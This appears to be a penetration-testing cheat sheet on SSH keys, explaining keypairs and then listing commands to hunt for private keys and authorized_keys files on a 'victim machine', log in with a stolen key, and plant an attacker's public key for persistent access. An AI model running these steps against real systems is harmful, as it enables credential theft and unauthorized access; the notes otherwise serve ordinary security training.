# SSH Keys

## What is SSH Keypair?

When we generate a SSH key using `ssh-keygen`, we are actually generating a RSA public/private key pair:

* **Public key**: `id_rsa.pub`
* **Private key**: `id_rsa`

SSH without password requires that your SSH public key `id_rsa.pub` is included in `authorized_keys`.

## Enumeration

Search for SSH private key:

```bash
find / -name id_rsa 2>/dev/null
```

Search for `authorized_keys` (authroized public keys so that no password needed when SSH):

```bash
find / -name authorized_keys 2>/dev/null
```

## SSH without Password

Once we get a SSH private key from the victim machine, we can try SSH in without password. Note that the public key must be recorded in `authorized_keys`.

Give appropriate permission to the private key:

```bash
chmod 600 id_rsa
```

SSH in:

```bash
ssh -i id_rsa <username>@<remote_ip>
```

## \~/.ssh/authozied\_keys

If `~/.ssh/authozied_keys` is writable on the victim machine, we can generate a SSH keypair and add the generated public key to this file. This will allow us to SSH into the victim machine using the generated private key.

Generate a SSH keypair on the attack machine:

```bash
ssh-keygen -f mykey
```

Add `mykey.pub` to `~/.ssh/authozied_keys` on the victim machine:

```bash
echo "<mykey.pub>" >> ~/.ssh/authorized_keys
```

Give appropriate permission to the private key:

```bash
chmod 600 mykey
```

SSH in:

```bash
ssh -i mykey <username>@<remote_ip>
```